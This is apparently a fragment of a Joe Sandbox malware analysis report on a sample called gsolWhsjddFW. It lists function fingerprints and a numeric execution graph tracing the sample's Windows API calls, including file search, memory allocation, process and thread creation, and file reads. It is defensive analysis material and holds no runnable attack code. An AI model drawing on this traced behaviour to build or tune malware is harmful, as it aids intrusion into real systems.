                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                      • API String ID: 0-685823316
                                                                      • Opcode ID: 1e7f5b191d5725785edbd9e7f07703a6d69112c12a973df7ffaacb3d2e199a46
                                                                      • Instruction ID: 6baa3a79552a17aae95b9862e7a0eebc317d45b87ce723155414940adcc19538
                                                                      • Opcode Fuzzy Hash: 1e7f5b191d5725785edbd9e7f07703a6d69112c12a973df7ffaacb3d2e199a46
                                                                      • Instruction Fuzzy Hash: B43181B5D10318AADF44DFD0CC85BEEBBB9BF04704F10815DE6047A180DBB556488FA8
                                                                      Function 0361879B Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :$:$:$A$I$N$P$m$s$t
                                                                      • API String ID: 0-2304485323
                                                                      • Opcode ID: 949a5fb0898cb99fc21f7ad31f5db1c4b9e0092180e2a01c5e8397fc1a5288f0
                                                                      • Instruction ID: 70b4f315607a8da87afe26bd0ddb924164d3eeedabbed078b2cf5c6e32e6d1e3
                                                                      • Opcode Fuzzy Hash: 949a5fb0898cb99fc21f7ad31f5db1c4b9e0092180e2a01c5e8397fc1a5288f0
                                                                      • Instruction Fuzzy Hash: 6FD107B5900714AFDB50DBA5CC80FEEBBB9BF48300F58451DE209EB240EB78A915CB65
                                                                      Function 0360EB76 Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .$P$e$i$m$o$r$x
                                                                      • API String ID: 0-620024284
                                                                      • Opcode ID: 5cff5fd438651834b08a05cdecca2b813bb80e81ca741c25799cf09952a48148
                                                                      • Instruction ID: 836c8ced3c829126ede1ad47ad23c68f743cfcf84575e66347fc8066ace89de2
                                                                      • Opcode Fuzzy Hash: 5cff5fd438651834b08a05cdecca2b813bb80e81ca741c25799cf09952a48148
                                                                      • Instruction Fuzzy Hash: BD41B7B5800328B6DB15DBA1DC44FEF777CAF54300F40859DA50D6B140EBB557898FA5
                                                                      Function 0360EB7B Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .$P$e$i$m$o$r$x
                                                                      • API String ID: 0-620024284
                                                                      • Opcode ID: d741c1a7e325a897b24961f9157b93f2af8c94c8219dbdd606332e5c104ea199
                                                                      • Instruction ID: 1cef3e632dc3e549f73265697464d461140e5a50feb8066446b1e06375b79a72
                                                                      • Opcode Fuzzy Hash: d741c1a7e325a897b24961f9157b93f2af8c94c8219dbdd606332e5c104ea199
                                                                      • Instruction Fuzzy Hash: E241B7B580032876EB25DBA1DC44FEF7B7CAF54300F40859DA50D5B180EBB457898FA5
                                                                      Function 0361381B Relevance: 8.9, Strings: 7, Instructions: 171COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4p{+$F$P$T$f$r$x
                                                                      • API String ID: 0-3640315310
                                                                      • Opcode ID: 9a2ebdbef0b99e5a10841743b3abcbd673b31e16dc9695151f2fdbf78eb533b2
                                                                      • Instruction ID: 31cb3eda84f6eb370a8db04db283160575d9c4fbce9b85838e8c85a54c21c7b9
                                                                      • Opcode Fuzzy Hash: 9a2ebdbef0b99e5a10841743b3abcbd673b31e16dc9695151f2fdbf78eb533b2
                                                                      • Instruction Fuzzy Hash: E6512674900704AEDB35DFA5CD44BEAF7F8BF44700F184A5EE14AAA280EBF46654CB91
                                                                      Function 0361BC8B Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: L$S$\$a$c$e$l
                                                                      • API String ID: 0-3322591375
                                                                      • Opcode ID: fe5db8e23601e4186cb554101e2d9db36515e5ba38ae3d582012475074512604
                                                                      • Instruction ID: d7c3f31f86c9fb84fb84e4f0c160ce2dcaf2c550e9218672da839a45eecace78
                                                                      • Opcode Fuzzy Hash: fe5db8e23601e4186cb554101e2d9db36515e5ba38ae3d582012475074512604
                                                                      • Instruction Fuzzy Hash: A6418776C04318AEDB14DFA5DC84AEEBBF8EF48300F05465ED909AB200E7715945CF94
                                                                      Function 03612A7B Relevance: 7.6, Strings: 6, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (HD$(HD$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                      • API String ID: 0-2079321013
                                                                      • Opcode ID: 3b479194db246e721b0cf36dffb93665d1934851b30c6c3aae27d9c50761d141
                                                                      • Instruction ID: 7695a6ba825b4678e380fac508cc10d40cec1fd5e3e233188aee2f9e4770c4ce
                                                                      • Opcode Fuzzy Hash: 3b479194db246e721b0cf36dffb93665d1934851b30c6c3aae27d9c50761d141
                                                                      • Instruction Fuzzy Hash: 23411E75911A287AEB02EB92CC41FEF7F7CAF55700F054149FA046E280DB746A158BEA
                                                                      Function 03612F2B Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $i$l$o$u
                                                                      • API String ID: 0-2051669658
                                                                      • Opcode ID: 68119f6f0bdfbf27130196f93642d0598cfa610fc5c6b142c558021d3ac22b88
                                                                      • Instruction ID: 91bca7fdd503fd010696b9773febf0d5c64898051e34444b7cc3216d1f2b5a64
                                                                      • Opcode Fuzzy Hash: 68119f6f0bdfbf27130196f93642d0598cfa610fc5c6b142c558021d3ac22b88
                                                                      • Instruction Fuzzy Hash: 19615EB5A00304AFDB24DBA4CC80FEFB7FCAB48710F24455DE55AA7240E775AA51CB60
                                                                      Function 0360ED5B Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0$0$6$I$P
                                                                      • API String ID: 0-1705191920
                                                                      • Opcode ID: e96a8b5073693c2c9445f3224549f5bafb5a64d66ccb2c42678a453fc12a231e
                                                                      • Instruction ID: a4190f33daaf777e1d5d8e53ca1cefdbdf32f090bec9b19e38372909d421f665
                                                                      • Opcode Fuzzy Hash: e96a8b5073693c2c9445f3224549f5bafb5a64d66ccb2c42678a453fc12a231e
                                                                      • Instruction Fuzzy Hash: 9E2144B5D10619BBEB14DFA4CD41BFF77B8EF44304F044198E904AB280EB76AA058BE5
                                                                      Function 03612BBB Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $e$k$o
                                                                      • API String ID: 0-3624523832
                                                                      • Opcode ID: 773371ba4f55f4037f74141f88d1d30647f59001283d462b67b6c5c633f277ee
                                                                      • Instruction ID: c22477bdb0b60745191c8baf3141257704c4de7877b229a421e2f6cb88933577
                                                                      • Opcode Fuzzy Hash: 773371ba4f55f4037f74141f88d1d30647f59001283d462b67b6c5c633f277ee
                                                                      • Instruction Fuzzy Hash: BCB13DB5A00708AFDB24DBA4CC94FEFB7FDAF88700F14895CF61997244DA75AA418B50
                                                                      Function 036134EB Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $e$h$o
                                                                      • API String ID: 0-3662636641
                                                                      • Opcode ID: 50de49d425e6a7b3130c8a516f6aaf1771ba8071c549d01e269aeccb8e5958a5
                                                                      • Instruction ID: 389d385a55191b495bcf0bfb10bdce58c068f1057ad8a97f462fc5748fb5247f
                                                                      • Opcode Fuzzy Hash: 50de49d425e6a7b3130c8a516f6aaf1771ba8071c549d01e269aeccb8e5958a5
                                                                      • Instruction Fuzzy Hash: B28183B6C003686ADB65DB95CC85FEF777CAF48200F40429EE509AA140EF746B858FA5
                                                                      Function 03610174 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $e$k$o
                                                                      • API String ID: 0-3624523832
                                                                      • Opcode ID: 9abe870ce33fa3506fe4b538bda9a76fc4f349ec5d2d0577c0b8ed139352b3d6
                                                                      • Instruction ID: bc0b6502a27692cd241fb83743ae6b67369514c3719392f29b536cce991efd9c
                                                                      • Opcode Fuzzy Hash: 9abe870ce33fa3506fe4b538bda9a76fc4f349ec5d2d0577c0b8ed139352b3d6
                                                                      • Instruction Fuzzy Hash: 1F11A1B2900618ABDB14DF99DCC4ADEFBB9FF48304F04824DE915AF201E771A945CBA0
                                                                      Function 0361017B Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $e$k$o
                                                                      • API String ID: 0-3624523832
                                                                      • Opcode ID: cc2148a800722edc643bdfb50f2fc0ce077f3ac4c8142d9d4301f675b9da2037
                                                                      • Instruction ID: 558d29a61ccf29a2186be09ba2de3173cd56886bff3e8eb17bbd56759d101d4c
                                                                      • Opcode Fuzzy Hash: cc2148a800722edc643bdfb50f2fc0ce077f3ac4c8142d9d4301f675b9da2037
                                                                      • Instruction Fuzzy Hash: 8101C4B2900318ABDB14DF99DCC4ADEBBB9FF08304F04820DE9059F201E771A945CBA0

                                                                      Execution Graph

                                                                      Execution Coverage:2.6%
                                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                                      Signature Coverage:2.2%
                                                                      Total number of Nodes:463
                                                                      Total number of Limit Nodes:74
                                                                      execution_graph 96096 2f73773 96101 2f783e0 96096->96101 96099 2f7379f 96102 2f783fa 96101->96102 96106 2f73783 96101->96106 96110 2f89200 96102->96110 96105 2f89b00 NtClose 96105->96106 96106->96099 96107 2f89b00 96106->96107 96108 2f89b1a 96107->96108 96109 2f89b2b NtClose 96108->96109 96109->96099 96111 2f8921a 96110->96111 96114 50b35c0 LdrInitializeThunk 96111->96114 96112 2f784ca 96112->96105 96114->96112 96115 2f7feb0 96116 2f7ff14 96115->96116 96144 2f76930 96116->96144 96118 2f8004e 96119 2f80047 96119->96118 96151 2f76a40 96119->96151 96121 2f801f3 96122 2f800ca 96122->96121 96123 2f80202 96122->96123 96155 2f7fc90 96122->96155 96124 2f89b00 NtClose 96123->96124 96126 2f8020c 96124->96126 96127 2f80106 96127->96123 96128 2f80111 96127->96128 96164 2f8bc20 96128->96164 96130 2f8013a 96131 2f80159 96130->96131 96132 2f80143 96130->96132 96167 2f7fb80 CoInitialize 96131->96167 96133 2f89b00 NtClose 96132->96133 96135 2f8014d 96133->96135 96136 2f80167 96170 2f895e0 96136->96170 96138 2f801e2 96139 2f89b00 NtClose 96138->96139 96140 2f801ec 96139->96140 96174 2f8bb40 96140->96174 96142 2f80185 96142->96138 96143 2f895e0 LdrInitializeThunk 96142->96143 96143->96142 96145 2f76963 96144->96145 96146 2f76984 96145->96146 96177 2f89680 96145->96177 96146->96119 96148 2f769a7 96148->96146 96149 2f89b00 NtClose 96148->96149 96150 2f76a29 96149->96150 96150->96119 96152 2f76a65 96151->96152 96182 2f89480 96152->96182 96156 2f7fcac 96155->96156 96187 2f74bd0 96156->96187 96158 2f7fcd3 96158->96127 96159 2f7fcca 96159->96158 96160 2f74bd0 LdrLoadDll 96159->96160 96161 2f7fd9e 96160->96161 96162 2f74bd0 LdrLoadDll 96161->96162 96163 2f7fdf8 96161->96163 96162->96163 96163->96127 96191 2f89e00 96164->96191 96166 2f8bc3b 96166->96130 96169 2f7fbe5 96167->96169 96168 2f7fc7b CoUninitialize 96168->96136 96169->96168 96171 2f895fa 96170->96171 96194 50b2ba0 LdrInitializeThunk 96171->96194 96172 2f8962a 96172->96142 96195 2f89e50 96174->96195 96176 2f8bb59 96176->96121 96178 2f8969a 96177->96178 96181 50b2ca0 LdrInitializeThunk 96178->96181 96179 2f896c6 96179->96148 96181->96179 96183 2f8949a 96182->96183 96186 50b2c60 LdrInitializeThunk 96183->96186 96184 2f76ad9 96184->96122 96186->96184 96188 2f74bf4 96187->96188 96189 2f74bfb 96188->96189 96190 2f74c30 LdrLoadDll 96188->96190 96189->96159 96190->96189 96192 2f89e1a 96191->96192 96193 2f89e2b RtlAllocateHeap 96192->96193 96193->96166 96194->96172 96196 2f89e6a 96195->96196 96197 2f89e7b RtlFreeHeap 96196->96197 96197->96176 96198 2f7b3b0 96203 2f7b0c0 96198->96203 96200 2f7b3bd 96219 2f7ad40 96200->96219 96202 2f7b3d9 96204 2f7b0e5 96203->96204 96231 2f789d0 96204->96231 96207 2f7b233 96207->96200 96209 2f7b24a 96209->96200 96211 2f7b241 96211->96209 96213 2f7b337 96211->96213 96250 2f854b0 96211->96250 96255 2f7a790 96211->96255 96214 2f854b0 GetFileAttributesW 96213->96214 96215 2f7b39a 96213->96215 96264 2f7ab00 96213->96264 96214->96213 96217 2f8bb40 RtlFreeHeap 96215->96217 96218 2f7b3a1 96217->96218 96218->96200 96220 2f7ad53 96219->96220 96223 2f7ad5e 96219->96223 96221 2f8bc20 RtlAllocateHeap 96220->96221 96221->96223 96222 2f7ad7c 96222->96202 96223->96222 96224 2f789d0 GetFileAttributesW 96223->96224 96225 2f7b092 96223->96225 96228 2f854b0 GetFileAttributesW 96223->96228 96229 2f7a790 RtlFreeHeap 96223->96229 96230 2f7ab00 RtlFreeHeap 96223->96230 96224->96223 96226 2f7b0a8 96225->96226 96227 2f8bb40 RtlFreeHeap 96225->96227 96226->96202 96227->96226 96228->96223 96229->96223 96230->96223 96232 2f789eb 96231->96232 96233 2f78a03 96232->96233 96234 2f789f8 GetFileAttributesW 96232->96234 96233->96207 96235 2f839d0 96233->96235 96234->96233 96236 2f839de 96235->96236 96237 2f839e5 96235->96237 96236->96211 96238 2f74bd0 LdrLoadDll 96237->96238 96239 2f83a1a 96238->96239 96240 2f83a29 96239->96240 96268 2f83490 LdrLoadDll 96239->96268 96242 2f8bc20 RtlAllocateHeap 96240->96242 96246 2f83bd4 96240->96246 96243 2f83a42 96242->96243 96244 2f83bca 96243->96244 96243->96246 96247 2f83a5e 96243->96247 96245 2f8bb40 RtlFreeHeap 96244->96245 96244->96246 96245->96246 96246->96211 96247->96246 96248 2f8bb40 RtlFreeHeap 96247->96248 96249 2f83bbe 96248->96249 96249->96211 96252 2f85514 96250->96252 96251 2f8554b 96251->96211 96252->96251 96269 2f78a20 96252->96269 96254 2f8552d 96254->96211 96256 2f7a7b6 96255->96256 96273 2f7e1c0 96256->96273 96258 2f7a828 96260 2f7a9b0 96258->96260 96262 2f7a846 96258->96262 96259 2f7a995 96259->96211 96260->96259 96261 2f7a650 RtlFreeHeap 96260->96261 96261->96260 96262->96259 96278 2f7a650 96262->96278 96265 2f7ab26 96264->96265 96266 2f7e1c0 RtlFreeHeap 96265->96266 96267 2f7abad 96266->96267 96267->96213 96268->96240 96270 2f789eb 96269->96270 96271 2f78a03 96270->96271 96272 2f789f8 GetFileAttributesW 96270->96272 96271->96254 96272->96271 96275 2f7e1e4 96273->96275 96274 2f7e1f1 96274->96258 96275->96274 96276 2f8bb40 RtlFreeHeap 96275->96276 96277 2f7e234 96276->96277 96277->96258 96279 2f7a66d 96278->96279 96282 2f7e250 96279->96282 96281 2f7a773 96281->96262 96283 2f7e274 96282->96283 96284 2f7e31e 96283->96284 96285 2f8bb40 RtlFreeHeap 96283->96285 96284->96281 96285->96284 96291 2f81df0 96292 2f81e0c 96291->96292 96293 2f81e48 96292->96293 96294 2f81e34 96292->96294 96296 2f89b00 NtClose 96293->96296 96295 2f89b00 NtClose 96294->96295 96297 2f81e3d 96295->96297 96298 2f81e51 96296->96298 96301 2f8bc60 RtlAllocateHeap 96298->96301 96300 2f81e5c 96301->96300 96302 2f807b0 96303 2f807cd 96302->96303 96304 2f74bd0 LdrLoadDll 96303->96304 96305 2f807eb 96304->96305 96306 2f89970 96307 2f89a14 96306->96307 96309 2f8999e 96306->96309 96308 2f89a2a NtReadFile 96307->96308 96315 2f7a27a 96318 2f7a27d 96315->96318 96316 2f7a290 96317 2f8bb40 RtlFreeHeap 96317->96316 96318->96316 96318->96317 96319 2f69f60 96321 2f6a288 96319->96321 96322 2f6a769 96321->96322 96323 2f8b7b0 96321->96323 96324 2f8b7d6 96323->96324 96329 2f641a0 96324->96329 96326 2f8b7e2 96327 2f8b81b 96326->96327 96332 2f85c60 96326->96332 96327->96322 96336 2f73880 96329->96336 96331 2f641ad 96331->96326 96333 2f85cc2 96332->96333 96335 2f85ccf 96333->96335 96354 2f72060 96333->96354 96335->96327 96337 2f7389a 96336->96337 96339 2f738b3 96337->96339 96340 2f8a520 96337->96340 96339->96331 96342 2f8a53a 96340->96342 96341 2f8a569 96341->96339 96342->96341 96347 2f89160 96342->96347 96345 2f8bb40 RtlFreeHeap 96346 2f8a5d9 96345->96346 96346->96339 96348 2f8917a 96347->96348 96351 50b2c0a 96348->96351 96349 2f891a6 96349->96345 96352 50b2c1f LdrInitializeThunk 96351->96352 96353 50b2c11 96351->96353 96352->96349 96353->96349 96355 2f7209b 96354->96355 96370 2f784f0 96355->96370 96357 2f720a3 96358 2f8bc20 RtlAllocateHeap 96357->96358 96368 2f72380 96357->96368 96359 2f720b9 96358->96359 96360 2f8bc20 RtlAllocateHeap 96359->96360 96361 2f720ca 96360->96361 96362 2f8bc20 RtlAllocateHeap 96361->96362 96363 2f720db 96362->96363 96369 2f72178 96363->96369 96385 2f77090 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96363->96385 96365 2f74bd0 LdrLoadDll 96366 2f72332 96365->96366 96381 2f885a0 96366->96381 96368->96335 96369->96365 96371 2f7851c 96370->96371 96372 2f783e0 2 API calls 96371->96372 96373 2f7853f 96372->96373 96374 2f78561 96373->96374 96375 2f78549 96373->96375 96377 2f7857d 96374->96377 96379 2f89b00 NtClose 96374->96379 96376 2f78554 96375->96376 96378 2f89b00 NtClose 96375->96378 96376->96357 96377->96357 96378->96376 96380 2f78573 96379->96380 96380->96357 96382 2f88602 96381->96382 96384 2f8860f 96382->96384 96386 2f72390 96382->96386 96384->96368 96385->96369 96402 2f787c0 96386->96402 96388 2f723b0 96396 2f728f3 96388->96396 96406 2f817d0 96388->96406 96391 2f725c7 96414 2f8cd10 96391->96414 96392 2f7240e 96392->96396 96409 2f8cbe0 96392->96409 96395 2f72629 96395->96396 96399 2f70eb0 LdrInitializeThunk 96395->96399 96423 2f78760 96395->96423 96396->96384 96397 2f725dc 96397->96395 96420 2f70eb0 96397->96420 96399->96395 96400 2f72777 96400->96395 96401 2f78760 LdrInitializeThunk 96400->96401 96401->96400 96403 2f787cd 96402->96403 96404 2f787f5 96403->96404 96405 2f787ee SetErrorMode 96403->96405 96404->96388 96405->96404 96427 2f8bac0 96406->96427 96408 2f817f1 96408->96392 96410 2f8cbf0 96409->96410 96411 2f8cbf6 96409->96411 96410->96391 96412 2f8bc20 RtlAllocateHeap 96411->96412 96413 2f8cc1c 96412->96413 96413->96391 96415 2f8cc80 96414->96415 96416 2f8bc20 RtlAllocateHeap 96415->96416 96417 2f8ccdd 96415->96417 96418 2f8ccba 96416->96418 96417->96397 96419 2f8bb40 RtlFreeHeap 96418->96419 96419->96417 96434 2f89d70 96420->96434 96424 2f78773 96423->96424 96439 2f89060 96424->96439 96426 2f7879e 96426->96395 96430 2f89c50 96427->96430 96429 2f8baee 96429->96408 96431 2f89cdf 96430->96431 96433 2f89c7b 96430->96433 96432 2f89cf5 NtAllocateVirtualMemory 96431->96432 96432->96429 96433->96429 96435 2f89d8d 96434->96435 96438 50b2c70 LdrInitializeThunk 96435->96438 96436 2f70ecf 96436->96400 96438->96436 96440 2f890db 96439->96440 96442 2f8908e 96439->96442 96444 50b2dd0 LdrInitializeThunk 96440->96444 96441 2f89100 96441->96426 96442->96426 96444->96441 96445 2f76220 96446 2f78760 LdrInitializeThunk 96445->96446 96447 2f76250 96446->96447 96449 2f7627c 96447->96449 96450 2f786e0 96447->96450 96451 2f78724 96450->96451 96452 2f78745 96451->96452 96457 2f88e30 96451->96457 96452->96447 96454 2f78735 96455 2f78751 96454->96455 96456 2f89b00 NtClose 96454->96456 96455->96447 96456->96452 96458 2f88eaa 96457->96458 96459 2f88e5e 96457->96459 96462 50b4650 LdrInitializeThunk 96458->96462 96459->96454 96460 2f88ecf 96460->96454 96462->96460 96463 2f777a0 96464 2f777b9 96463->96464 96468 2f7780c 96463->96468 96466 2f89b00 NtClose 96464->96466 96464->96468 96465 2f77944 96467 2f777d4 96466->96467 96473 2f76bc0 NtClose LdrInitializeThunk LdrInitializeThunk 96467->96473 96468->96465 96474 2f76bc0 NtClose LdrInitializeThunk LdrInitializeThunk 96468->96474 96470 2f7791e 96470->96465 96475 2f76d90 NtClose LdrInitializeThunk LdrInitializeThunk 96470->96475 96473->96468 96474->96470 96475->96465 96476 2f860a0 96477 2f86105 96476->96477 96478 2f86140 96477->96478 96481 2f81aa0 96477->96481 96480 2f86122 96482 2f81ab7 96481->96482 96483 2f81a45 96481->96483 96484 2f89b00 NtClose 96483->96484 96485 2f81a8c 96484->96485 96485->96480 96486 2f89a60 96487 2f89ad1 96486->96487 96489 2f89a8b 96486->96489 96488 2f89ae7 NtDeleteFile 96487->96488 96490 2f80220 96493 2f87b00 96490->96493 96492 2f8023f 96494 2f87b65 96493->96494 96495 2f87b94 96494->96495 96498 2f7dfc0 96494->96498 96495->96492 96497 2f87b76 96497->96492 96499 2f7dfbb 96498->96499 96501 2f7df30 96498->96501 96499->96497 96500 2f7dfac 96500->96497 96501->96500 96502 2f854b0 GetFileAttributesW 96501->96502 96502->96501 96503 50b2ad0 LdrInitializeThunk 96504 2f72de8 96505 2f72e08 96504->96505 96506 2f76930 2 API calls 96505->96506 96507 2f72e13 96506->96507 96508 2f6bbd0 96509 2f8bac0 NtAllocateVirtualMemory 96508->96509 96510 2f6d241 96509->96510 96511 2f7cc50 96513 2f7cc79 96511->96513 96512 2f7cd7d 96513->96512 96514 2f7cd23 FindFirstFileW 96513->96514 96514->96512 96516 2f7cd3e 96514->96516 96515 2f7cd64 FindNextFileW 96515->96516 96517 2f7cd76 FindClose 96515->96517 96516->96515 96517->96512 96518 2f72910 96519 2f72936 96518->96519 96520 2f89160 LdrInitializeThunk 96519->96520 96521 2f72946 96520->96521 96524 2f89b90 96521->96524 96523 2f7295b 96525 2f89c19 96524->96525 96526 2f89bbb 96524->96526 96529 50b2e80 LdrInitializeThunk 96525->96529 96526->96523 96527 2f89c4a 96527->96523 96529->96527 96530 2f866d0 96531 2f8672a 96530->96531 96533 2f86737 96531->96533 96534 2f840e0 96531->96534 96535 2f8bac0 NtAllocateVirtualMemory 96534->96535 96537 2f8411e 96535->96537 96536 2f8422e 96536->96533 96537->96536 96538 2f74bd0 LdrLoadDll 96537->96538 96540 2f84164 96538->96540 96539 2f841b0 Sleep 96539->96540 96540->96536 96540->96539 96541 2f89810 96542 2f898c1 96541->96542 96544 2f8983f 96541->96544 96543 2f898d7 NtCreateFile 96542->96543 96545 2f88f90 96546 2f8901c 96545->96546 96547 2f88fbe 96545->96547 96550 50b2ee0 LdrInitializeThunk 96546->96550 96548 2f8904d 96550->96548 96556 2f89110 96557 2f8912d 96556->96557 96560 50b2df0 LdrInitializeThunk 96557->96560 96558 2f89155 96560->96558 96563 2f78e84 96565 2f78e94 96563->96565 96564 2f78e41 96565->96564 96567 2f77720 96565->96567 96568 2f77736 96567->96568 96570 2f7776f 96567->96570 96568->96570 96571 2f77590 LdrLoadDll 96568->96571 96570->96564 96571->96570 96572 2f69f00 96573 2f69f0f 96572->96573 96574 2f69f50 96573->96574 96575 2f69f3d CreateThread 96573->96575 96576 2f77400 96577 2f7742a 96576->96577 96580 2f78590 96577->96580 96579 2f7744e 96581 2f785ad 96580->96581 96587 2f89250 96581->96587 96583 2f785fd 96584 2f78604 96583->96584 96592 2f89330 96583->96592 96584->96579 96586 2f7862d 96586->96579 96588 2f8927b 96587->96588 96589 2f892e5 96587->96589 96588->96583 96597 50b2f30 LdrInitializeThunk 96589->96597 96590 2f8931e 96590->96583 96593 2f893da 96592->96593 96595 2f8935e 96592->96595 96598 50b2d10 LdrInitializeThunk 96593->96598 96594 2f8941f 96594->96586 96595->96586 96597->96590 96598->96594 96599 2f77980 96600 2f77995 96599->96600 96602 2f779ef 96599->96602 96600->96602 96603 2f7b8e0 96600->96603 96604 2f7b906 96603->96604 96605 2f7bb36 96604->96605 96630 2f89ee0 96604->96630 96605->96602 96607 2f7b97c 96607->96605 96608 2f8cd10 2 API calls 96607->96608 96609 2f7b99b 96608->96609 96609->96605 96610 2f7ba6f 96609->96610 96611 2f89160 LdrInitializeThunk 96609->96611 96613 2f761a0 LdrInitializeThunk 96610->96613 96614 2f7ba8e 96610->96614 96612 2f7b9fa 96611->96612 96612->96610 96616 2f7ba03 96612->96616 96613->96614 96629 2f7bb1e 96614->96629 96636 2f88cd0 96614->96636 96615 2f7ba57 96618 2f78760 LdrInitializeThunk 96615->96618 96616->96605 96616->96615 96617 2f7ba35 96616->96617 96633 2f761a0 96616->96633 96651 2f84de0 LdrInitializeThunk 96617->96651 96622 2f7ba65 96618->96622 96622->96602 96623 2f78760 LdrInitializeThunk 96625 2f7bb2c 96623->96625 96624 2f7baf5 96641 2f88d80 96624->96641 96625->96602 96627 2f7bb0f 96646 2f88ee0 96627->96646 96629->96623 96631 2f89efd 96630->96631 96632 2f89f0e CreateProcessInternalW 96631->96632 96632->96607 96634 2f89330 LdrInitializeThunk 96633->96634 96635 2f761de 96634->96635 96635->96617 96637 2f88d4a 96636->96637 96639 2f88cfe 96636->96639 96652 50b39b0 LdrInitializeThunk 96637->96652 96638 2f88d6f 96638->96624 96639->96624 96642 2f88dfa 96641->96642 96643 2f88dae 96641->96643 96653 50b4340 LdrInitializeThunk 96642->96653 96643->96627 96644 